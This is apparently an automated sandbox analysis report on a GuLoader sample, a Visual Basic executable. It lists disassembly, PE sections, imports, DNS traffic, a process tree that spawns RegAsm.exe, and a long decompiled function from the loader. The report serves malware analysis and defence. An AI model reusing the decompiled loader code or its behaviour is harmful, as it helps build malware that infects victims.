jc 00007FC0949B6819h
mov ecx, dword ptr [ebx+5Fh]
dec esi
clc
retf
dec ebp
adc dword ptr [edi-48h], 76h
adc byte ptr [4F3A912Eh], bl
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop ss
add dword ptr [eax], eax
add byte ptr [eax+eax+00h], dl
add byte ptr [eax], al
or al, 00h
jne 00007FC0949B68C6h
jnc 00007FC0949B68C3h
outsb
jc 00007FC0949B68CCh
outsb
jc 00007FC0949B6864h
or eax, 54000D01h
popad

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23ab4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2a000	0x9b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x23130	0x24000	False	0.419569227431	data	6.02803482745	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x25000	0x460c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2a000	0x9b4	0x1000	False	0.17724609375	data	2.10021451926	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x2a884	0x130	data
RT_ICON	0x2a59c	0x2e8	data
RT_ICON	0x2a474	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x2a444	0x30	data
RT_VERSION	0x2a150	0x2f4	data

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaVar2Vec, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Vought
InternalName	Uruguayanernes5
FileVersion	1.00
CompanyName	Vought
LegalTrademarks	Vought
Comments	Vought
ProductName	Vought
ProductVersion	1.00
FileDescription	Vought
OriginalFilename	Uruguayanernes5.exe

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 22, 2021 13:16:04.022247076 CEST	65307	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:04.071670055 CEST	53	65307	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:05.343327999 CEST	64344	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:05.369664907 CEST	62060	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:05.402415037 CEST	53	64344	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:05.406553984 CEST	61805	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:05.419886112 CEST	53	62060	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:05.457952023 CEST	53	61805	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:06.622735977 CEST	54795	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:06.671664953 CEST	53	54795	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:08.462213993 CEST	49557	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:08.521538019 CEST	53	49557	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:09.191998959 CEST	61733	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:09.243575096 CEST	53	61733	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:11.151460886 CEST	65447	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:11.203442097 CEST	53	65447	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:12.230552912 CEST	52441	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:12.285553932 CEST	53	52441	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:15.510654926 CEST	62176	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:15.562283039 CEST	53	62176	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:16.340872049 CEST	59596	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:16.389904022 CEST	53	59596	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:17.944291115 CEST	65296	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:17.995753050 CEST	53	65296	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:19.297769070 CEST	63183	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:19.346590996 CEST	53	63183	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:20.653418064 CEST	60151	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:20.702169895 CEST	53	60151	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:21.551079988 CEST	56969	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:21.611035109 CEST	53	56969	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:32.704593897 CEST	55161	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:32.763308048 CEST	53	55161	8.8.8.8	192.168.2.5
Apr 22, 2021 13:16:59.578900099 CEST	54757	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:16:59.639167070 CEST	53	54757	8.8.8.8	192.168.2.5
Apr 22, 2021 13:17:02.901556015 CEST	49992	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:17:02.950134039 CEST	53	49992	8.8.8.8	192.168.2.5
Apr 22, 2021 13:17:14.093085051 CEST	60075	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:17:14.162861109 CEST	53	60075	8.8.8.8	192.168.2.5
Apr 22, 2021 13:17:24.351308107 CEST	55016	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:17:24.409837008 CEST	53	55016	8.8.8.8	192.168.2.5
Apr 22, 2021 13:17:56.500247955 CEST	64345	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:17:56.548854113 CEST	53	64345	8.8.8.8	192.168.2.5
Apr 22, 2021 13:18:17.169271946 CEST	57128	53	192.168.2.5	8.8.8.8
Apr 22, 2021 13:18:17.236749887 CEST	53	57128	8.8.8.8	192.168.2.5

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: yiu0bguw4d.exe PID: 204 Parent PID: 5564

General

Start time:	13:16:11
Start date:	22/04/2021
Path:	C:\Users\user\Desktop\yiu0bguw4d.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\yiu0bguw4d.exe'
Imagebase:	0x400000
File size:	159744 bytes
MD5 hash:	D5B8E2CE449917BF395454082DE6CBA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6304 Parent PID: 204

General

Start time:	13:17:00
Start date:	22/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\yiu0bguw4d.exe'
Imagebase:	0x610000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6344 Parent PID: 6304

General

Start time:	13:17:02
Start date:	22/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: yiu0bguw4d.exe PID: 204 Parent PID: 5564 yiu0bguw4d.exeCOMMON

Executed Functions

Function 004141F4, Relevance: 894.4, APIs: 467, Strings: 42, Instructions: 3662
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E004141F4(signed int _a4) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				void* _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				short _v84;
				signed int _v88;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				void* _v104;
				char _v112;
				void* _v128;
				void* _v160;
				void* _v164;
				void* _v168;
				char _v172;
				char _v180;
				char _v184;
				short _v188;
				long long _v196;
				char _v200;
				short _v204;
				char _v208;
				short _v212;
				char _v220;
				signed int _v224;
				char _v228;
				signed int _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char* _v268;
				char _v276;
				char* _v284;
				char _v292;
				char* _v300;
				char _v308;
				char* _v316;
				char _v324;
				void* _v332;
				char _v340;
				char* _v348;
				char _v356;
				char _v364;
				char _v372;
				char _v376;
				char* _v384;
				char _v392;
				char* _v400;
				char _v408;
				signed int _v416;
				char _v424;
				void* _v476;
				char _v480;
				char _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				char _v496;
				signed int _v500;
				signed int _v504;
				void* _v508;
				signed int _v512;
				void* _v516;
				signed int _v520;
				void* _v524;
				signed int _v528;
				short _v532;
				char _v548;
				char _v564;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				intOrPtr _v604;
				intOrPtr* _v608;
				signed int _v612;
				intOrPtr* _v616;
				signed int _v620;
				intOrPtr* _v624;
				signed int _v628;
				intOrPtr* _v632;
				signed int _v636;
				intOrPtr* _v640;
				signed int _v644;
				signed int _v648;
				intOrPtr* _v652;
				signed int _v656;
				intOrPtr* _v660;
				signed int _v664;
				intOrPtr* _v668;
				signed int _v672;
				intOrPtr* _v676;
				signed int _v680;
				intOrPtr* _v684;
				signed int _v688;
				signed int _v692;
				intOrPtr* _v696;
				signed int _v700;
				signed int _v704;
				intOrPtr* _v708;
				signed int _v712;
				intOrPtr* _v716;
				signed int _v720;
				intOrPtr* _v724;
				signed int _v728;
				intOrPtr* _v732;
				signed int _v736;
				intOrPtr* _v740;
				signed int _v744;
				signed int _v748;
				intOrPtr* _v752;
				signed int _v756;
				intOrPtr* _v760;
				signed int _v764;
				intOrPtr* _v768;
				signed int _v772;
				intOrPtr* _v776;
				signed int _v780;
				intOrPtr* _v784;
				signed int _v788;
				intOrPtr* _v792;
				signed int _v796;
				intOrPtr* _v800;
				signed int _v804;
				intOrPtr* _v808;
				signed int _v812;
				intOrPtr* _v816;
				signed int _v820;
				intOrPtr* _v824;
				signed int _v828;
				intOrPtr* _v832;
				signed int _v836;
				intOrPtr* _v840;
				signed int _v844;
				intOrPtr* _v848;
				signed int _v852;
				intOrPtr* _v856;
				signed int _v860;
				intOrPtr* _v864;
				signed int _v868;
				intOrPtr* _v872;
				signed int _v876;
				intOrPtr* _v880;
				signed int _v884;
				intOrPtr* _v888;
				signed int _v892;
				intOrPtr* _v896;
				signed int _v900;
				intOrPtr* _v904;
				signed int _v908;
				intOrPtr* _v912;
				signed int _v916;
				intOrPtr* _v920;
				signed int _v924;
				intOrPtr* _v928;
				signed int _v932;
				intOrPtr* _v936;
				signed int _v940;
				intOrPtr* _v944;
				signed int _v948;
				intOrPtr* _v952;
				signed int _v956;
				intOrPtr* _v960;
				signed int _v964;
				intOrPtr* _v968;
				signed int _v972;
				intOrPtr* _v976;
				signed int _v980;
				intOrPtr* _v984;
				signed int _v988;
				intOrPtr* _v992;
				signed int _v996;
				intOrPtr* _v1000;
				signed int _v1004;
				intOrPtr* _v1008;
				signed int _v1012;
				intOrPtr* _v1016;
				signed int _v1020;
				intOrPtr* _v1024;
				signed int _v1028;
				signed int _v1032;
				intOrPtr* _v1036;
				signed int _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				intOrPtr* _v1056;
				signed int _v1060;
				intOrPtr* _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				intOrPtr* _v1092;
				signed int _v1096;
				signed int _t1707;
				signed int _t1711;
				char* _t1716;
				signed int _t1720;
				char* _t1725;
				signed int _t1729;
				char* _t1730;
				char* _t1731;
				char* _t1732;
				char* _t1736;
				signed int _t1740;
				signed int _t1760;
				signed int _t1764;
				char* _t1768;
				signed int _t1772;
				char* _t1777;
				signed int _t1781;
				char* _t1786;
				signed int _t1790;
				char* _t1794;
				char* _t1795;
				signed int _t1811;
				signed int _t1814;
				signed int _t1818;
				char* _t1821;
				signed int _t1825;
				signed int _t1829;
				signed int _t1830;
				signed int _t1838;
				signed int _t1844;
				signed int _t1858;
				char* _t1864;
				signed int _t1877;
				signed int _t1886;
				signed int _t1890;
				char* _t1897;
				char* _t1898;
				short _t1899;
				char* _t1900;
				signed int _t1903;
				signed int _t1909;
				signed int _t1914;
				signed int _t1921;
				signed int _t1926;
				signed int _t1931;
				signed int _t1935;
				char* _t1940;
				signed int _t1944;
				signed int _t1950;
				char* _t1953;
				signed int _t1956;
				signed int _t1969;
				signed int _t1974;
				signed int _t1978;
				signed int _t1982;
				signed int _t1989;
				signed int _t1993;
				signed int _t1997;
				signed int _t2001;
				signed int _t2005;
				signed int _t2009;
				signed int _t2013;
				signed int _t2017;
				signed int _t2021;
				signed int _t2025;
				char* _t2026;
				signed int _t2032;
				signed int _t2036;
				signed int _t2040;
				signed int _t2044;
				signed int _t2048;
				signed int _t2052;
				signed int _t2056;
				signed int _t2060;
				signed int _t2064;
				signed int _t2068;
				signed int _t2072;
				signed int _t2076;
				signed int _t2080;
				signed int _t2084;
				signed int _t2088;
				signed int _t2092;
				signed int _t2096;
				signed int _t2100;
				signed int _t2104;
				signed int _t2108;
				signed int _t2112;
				signed int _t2116;
				signed int _t2120;
				signed int _t2124;
				signed int _t2128;
				signed int _t2132;
				signed int _t2136;
				signed int _t2140;
				signed int _t2144;
				signed int _t2148;
				signed int _t2152;
				signed int _t2156;
				signed int _t2160;
				signed int _t2164;
				signed int _t2168;
				signed int _t2172;
				signed int _t2176;
				signed int _t2180;
				signed int _t2184;
				signed int _t2188;
				signed int _t2192;
				signed int _t2196;
				signed int _t2200;
				signed int _t2204;
				signed int _t2208;
				signed int _t2212;
				signed int _t2216;
				signed int _t2220;
				signed int _t2224;
				signed int _t2228;
				signed int _t2232;
				signed int _t2236;
				char* _t2237;
				signed int _t2243;
				signed int _t2247;
				signed int _t2255;
				signed int _t2272;
				signed int _t2276;
				signed int _t2297;
				signed int _t2302;
				signed int _t2309;
				signed int _t2314;
				char* _t2318;
				char* _t2319;
				signed int _t2322;
				short _t2323;
				signed int _t2329;
				signed int _t2333;
				void* _t2334;
				char* _t2362;
				char* _t2370;
				char* _t2643;
				void* _t2722;
				void* _t2727;
				intOrPtr _t2801;
				void* _t2802;
				void* _t2803;
				void* _t2804;
				void* _t2806;
				void* _t2807;
				void* _t2808;
				void* _t2810;
				void* _t2811;
				void* _t2813;
				void* _t2816;
				void* _t2818;
				void* _t2820;
				signed int _t2947;
				char _t2951;

				 *[fs:0x0] = _t2801;
				L00401530();
				_v28 = _t2801;
				_v24 = 0x4011d8;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, _t2722, _t2727, _t2334,  *[fs:0x0], 0x401536);
				_v8 = 1;
				_v8 = 2;
				if( *0x425010 != 0) {
					_v608 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v608 = 0x425010;
				}
				_t1707 =  &_v236;
				L004017C4();
				_v500 = _t1707;
				_t1711 =  *((intOrPtr*)( *_v500 + 0x130))(_v500,  &_v240, _t1707,  *((intOrPtr*)( *((intOrPtr*)( *_v608)) + 0x308))( *_v608));
				asm("fclex");
				_v504 = _t1711;
				if(_v504 >= 0) {
					_v612 = _v612 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x405050);
					_push(_v500);
					_push(_v504);
					L004017B8();
					_v612 = _t1711;
				}
				_push(0);
				_push(0);
				_push(_v240);
				_push( &_v276);
				L004017CA();
				_t2802 = _t2801 + 0x10;
				if( *0x425010 != 0) {
					_v616 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v616 = 0x425010;
				}
				_t1716 =  &_v244;
				L004017C4();
				_v508 = _t1716;
				_t1720 =  *((intOrPtr*)( *_v508 + 0x158))(_v508,  &_v248, _t1716,  *((intOrPtr*)( *((intOrPtr*)( *_v616)) + 0x300))( *_v616));
				asm("fclex");
				_v512 = _t1720;
				if(_v512 >= 0) {
					_v620 = _v620 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x405060);
					_push(_v508);
					_push(_v512);
					L004017B8();
					_v620 = _t1720;
				}
				_push(0);
				_push(0);
				_push(_v248);
				_push( &_v292);
				L004017CA();
				_t2803 = _t2802 + 0x10;
				if( *0x425010 != 0) {
					_v624 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v624 = 0x425010;
				}
				_t1725 =  &_v252;
				L004017C4();
				_v516 = _t1725;
				_t1729 =  *((intOrPtr*)( *_v516 + 0x158))(_v516,  &_v256, _t1725,  *((intOrPtr*)( *((intOrPtr*)( *_v624)) + 0x300))( *_v624));
				asm("fclex");
				_v520 = _t1729;
				if(_v520 >= 0) {
					_v628 = _v628 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x405060);
					_push(_v516);
					_push(_v520);
					L004017B8();
					_v628 = _t1729;
				}
				_push(0);
				_push(0);
				_push(_v256);
				_t1730 =  &_v308;
				_push(_t1730);
				L004017CA();
				_t2804 = _t2803 + 0x10;
				_push(_t1730);
				L004017B2();
				_push(_t1730);
				_t1731 =  &_v292;
				_push(_t1731);
				L004017B2();
				_push(_t1731);
				_t1732 =  &_v276;
				_push(_t1732);
				L004017B2();
				_push(_t1732);
				E00404D18();
				_v480 = _t1732;
				L004017AC();
				if( *0x425010 != 0) {
					_v632 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v632 = 0x425010;
				}
				_t1736 =  &_v260;
				L004017C4();
				_v524 = _t1736;
				_t1740 =  *((intOrPtr*)( *_v524 + 0x60))(_v524,  &_v484, _t1736,  *((intOrPtr*)( *((intOrPtr*)( *_v632)) + 0x300))( *_v632));
				asm("fclex");
				_v528 = _t1740;
				if(_v528 >= 0) {
					_v636 = _v636 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x405060);
					_push(_v524);
					_push(_v528);
					L004017B8();
					_v636 = _t1740;
				}
				asm("sbb eax, eax");
				_v532 =  ~( ~(_v480 - _v484) + 1);
				_push( &_v260);
				_push( &_v256);
				_push( &_v248);
				_push( &_v240);
				_push( &_v252);
				_push( &_v244);
				_push( &_v236);
				_push(7);
				L004017A6();
				_push( &_v308);
				_push( &_v292);
				_push( &_v276);
				_push(3);
				L004017A0();
				_t2806 = _t2804 + 0x30;
				if(_v532 != 0) {
					_v8 = 3;
					_v268 = 0x80020004;
					_v276 = 0xa;
					_t2323 =  &_v276;
					_push(_t2323);
					L0040179A();
					_v188 = _t2323;
					L00401794();
					_v8 = 4;
					if( *0x425698 != 0) {
						_v640 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v640 = 0x425698;
					}
					_v500 =  *_v640;
					_t2329 =  *((intOrPtr*)( *_v500 + 0x4c))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t2329;
					if(_v504 >= 0) {
						_v644 = _v644 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x405080);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v644 = _t2329;
					}
					_v508 = _v236;
					_t2333 =  *((intOrPtr*)( *_v508 + 0x28))(_v508);
					asm("fclex");
					_v512 = _t2333;
					if(_v512 >= 0) {
						_v648 = _v648 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x4050a0);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v648 = _t2333;
					}
					L0040178E();
					_v8 = 5;
					_v8 = 6;
					_push(0x74);
					L00401788();
					_v88 = _t2333;
				}
				_v8 = 8;
				if( *0x425010 != 0) {
					_v652 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v652 = 0x425010;
				}
				_t1760 =  &_v236;
				L004017C4();
				_v500 = _t1760;
				_t1764 =  *((intOrPtr*)( *_v500 + 0x180))(_v500,  &_v480, _t1760,  *((intOrPtr*)( *((intOrPtr*)( *_v652)) + 0x300))( *_v652));
				asm("fclex");
				_v504 = _t1764;
				if(_v504 >= 0) {
					_v656 = _v656 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x405060);
					_push(_v500);
					_push(_v504);
					L004017B8();
					_v656 = _t1764;
				}
				if( *0x425010 != 0) {
					_v660 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v660 = 0x425010;
				}
				_t1768 =  &_v240;
				L004017C4();
				_v508 = _t1768;
				_t1772 =  *((intOrPtr*)( *_v508 + 0x100))(_v508,  &_v244, _t1768,  *((intOrPtr*)( *((intOrPtr*)( *_v660)) + 0x300))( *_v660));
				asm("fclex");
				_v512 = _t1772;
				if(_v512 >= 0) {
					_v664 = _v664 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x405060);
					_push(_v508);
					_push(_v512);
					L004017B8();
					_v664 = _t1772;
				}
				_push(0);
				_push(0);
				_push(_v244);
				_push( &_v276);
				L004017CA();
				_t2807 = _t2806 + 0x10;
				if( *0x425010 != 0) {
					_v668 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v668 = 0x425010;
				}
				_t1777 =  &_v248;
				L004017C4();
				_v516 = _t1777;
				_t1781 =  *((intOrPtr*)( *_v516 + 0x110))(_v516,  &_v252, _t1777,  *((intOrPtr*)( *((intOrPtr*)( *_v668)) + 0x304))( *_v668));
				asm("fclex");
				_v520 = _t1781;
				if(_v520 >= 0) {
					_v672 = _v672 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x4050b0);
					_push(_v516);
					_push(_v520);
					L004017B8();
					_v672 = _t1781;
				}
				_push(0);
				_push(0);
				_push(_v252);
				_push( &_v292);
				L004017CA();
				_t2808 = _t2807 + 0x10;
				if( *0x425010 != 0) {
					_v676 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v676 = 0x425010;
				}
				_t1786 =  &_v256;
				L004017C4();
				_v524 = _t1786;
				_t1790 =  *((intOrPtr*)( *_v524 + 0x198))(_v524,  &_v484, _t1786,  *((intOrPtr*)( *((intOrPtr*)( *_v676)) + 0x308))( *_v676));
				asm("fclex");
				_v528 = _t1790;
				if(_v528 >= 0) {
					_v680 = _v680 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x405050);
					_push(_v524);
					_push(_v528);
					L004017B8();
					_v680 = _t1790;
				}
				_push( &_v220);
				_push(_v484);
				_push( &_v180);
				_push( &_v112);
				_t1794 =  &_v292;
				_push(_t1794);
				L004017B2();
				_push(_t1794);
				_t1795 =  &_v276;
				_push(_t1795);
				L004017B2();
				_push(_t1795);
				_push(_v480);
				E00404D88();
				_v488 = _t1795;
				L004017AC();
				_v532 =  ~(0 | _v488 == 0x00012c78);
				_push( &_v252);
				_push( &_v244);
				_push( &_v256);
				_push( &_v248);
				_push( &_v240);
				_push( &_v236);
				_push(6);
				L004017A6();
				_push( &_v292);
				_push( &_v276);
				_push(2);
				L004017A0();
				_t2810 = _t2808 + 0x28;
				if(_v532 != 0) {
					_v8 = 9;
					if( *0x425698 != 0) {
						_v684 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v684 = 0x425698;
					}
					_v500 =  *_v684;
					_t2297 =  *((intOrPtr*)( *_v500 + 0x14))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t2297;
					if(_v504 >= 0) {
						_v688 = _v688 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v688 = _t2297;
					}
					_v508 = _v236;
					_t2302 =  *((intOrPtr*)( *_v508 + 0x78))(_v508,  &_v476);
					asm("fclex");
					_v512 = _t2302;
					if(_v512 >= 0) {
						_v692 = _v692 & 0x00000000;
					} else {
						_push(0x78);
						_push(0x4050c0);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v692 = _t2302;
					}
					_v84 = _v476;
					L0040178E();
					_v8 = 0xa;
					if( *0x425698 != 0) {
						_v696 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v696 = 0x425698;
					}
					_v500 =  *_v696;
					_t2309 =  *((intOrPtr*)( *_v500 + 0x14))(_v500,  &_v236);
					asm("fclex");
					_v504 = _t2309;
					if(_v504 >= 0) {
						_v700 = _v700 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v700 = _t2309;
					}
					_v508 = _v236;
					_t2314 =  *((intOrPtr*)( *_v508 + 0x140))(_v508,  &_v476);
					asm("fclex");
					_v512 = _t2314;
					if(_v512 >= 0) {
						_v704 = _v704 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050c0);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v704 = _t2314;
					}
					_v60 = _v476;
					L0040178E();
					_v8 = 0xb;
					if( *0x425698 != 0) {
						_v708 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v708 = 0x425698;
					}
					_v500 =  *_v708;
					_t2318 =  &_v80;
					L0040177C();
					_t2319 =  &_v236;
					L00401782();
					_t2322 =  *((intOrPtr*)( *_v500 + 0x10))(_v500, _t2319, _t2319, _t2318, _t2318);
					asm("fclex");
					_v504 = _t2322;
					if(_v504 >= 0) {
						_v712 = _v712 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x405080);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v712 = _t2322;
					}
					L0040178E();
				}
				_v8 = 0xd;
				if( *0x425010 != 0) {
					_v716 = 0x425010;
				} else {
					_push(0x425010);
					_push(0x404370);
					L004017BE();
					_v716 = 0x425010;
				}
				_t1811 =  &_v236;
				L004017C4();
				_v500 = _t1811;
				_t1814 =  *((intOrPtr*)( *_v500 + 0x20c))(_v500, _t1811,  *((intOrPtr*)( *((intOrPtr*)( *_v716)) + 0x30c))( *_v716));
				asm("fclex");
				_v504 = _t1814;
				if(_v504 >= 0) {
					_v720 = _v720 & 0x00000000;
				} else {
					_push(0x20c);
					_push(0x405050);
					_push(_v500);
					_push(_v504);
					L004017B8();
					_v720 = _t1814;
				}
